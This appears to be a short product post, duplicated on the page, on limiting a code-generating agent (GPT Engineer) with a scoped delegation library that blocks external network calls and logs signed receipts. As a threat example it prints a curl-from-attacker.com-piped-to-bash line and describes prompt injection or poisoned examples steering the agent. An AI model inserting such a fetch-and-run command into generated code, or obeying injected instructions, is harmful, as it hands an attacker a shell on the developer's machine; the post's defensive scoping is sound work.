GPT Engineer generates entire codebases from specifications. The agent reads specs, writes code, creates files, and builds projects. During generation, it has unrestricted filesystem access within the project directory and can execute code to test what it builds.
The risk profile: an agent that generates and executes code is one malicious specification (or prompt injection in a dependency) away from executing arbitrary code. The spec says "build a web scraper" — the generated code includes os.system('curl attacker.com/shell.sh | bash') because a poisoned code example was in the training data or a dependency README.
Delegation scoping per generation task:
from agent_passport_system import create_delegation, govern_action
# Generation task gets scoped authority
gen_delegation = create_delegation(
delegated_to=agent_key,
delegated_by=developer_key,
scope=[
"file:write:/project/src",
"file:write:/project/tests",
"file:write:/project/package.json",
"code:execute:/project" # can test within project
],
# no file outside /project, no network:external, no shell:arbitrary
spend_limit=15000, # $150 LLM budget for generation
expires_in_seconds=7200,
max_depth=0
)
# Generated code tries to make an external network call → blocked
result = govern_action(
action={"type": "network:external", "url": "https://attacker.com/payload"},
delegation=gen_delegation,
passport=agent_passport
)
# Blocked: network:external not in scope. Signed receipt.Every file write and code execution produces a signed receipt. After generation completes, the developer has a full audit: which files were created, which code was executed, and the signed proof that nothing outside the project boundary was touched.
The spend limit prevents runaway generation. If the agent enters a generation loop, the budget cap kills it before it burns through API credits.
pip install agent-passport-system (v0.8.0, Apache-2.0) or npm install agent-passport-system (v1.36.2).
GPT Engineer generates entire codebases from specifications. The agent reads specs, writes code, creates files, and builds projects. During generation, it has unrestricted filesystem access within the project directory and can execute code to test what it builds.
The risk profile: an agent that generates and executes code is one malicious specification (or prompt injection in a dependency) away from executing arbitrary code. The spec says "build a web scraper" — the generated code includes
os.system('curl attacker.com/shell.sh | bash')because a poisoned code example was in the training data or a dependency README.Delegation scoping per generation task:
Every file write and code execution produces a signed receipt. After generation completes, the developer has a full audit: which files were created, which code was executed, and the signed proof that nothing outside the project boundary was touched.
The spend limit prevents runaway generation. If the agent enters a generation loop, the budget cap kills it before it burns through API credits.
pip install agent-passport-system(v0.8.0, Apache-2.0) ornpm install agent-passport-system(v1.36.2).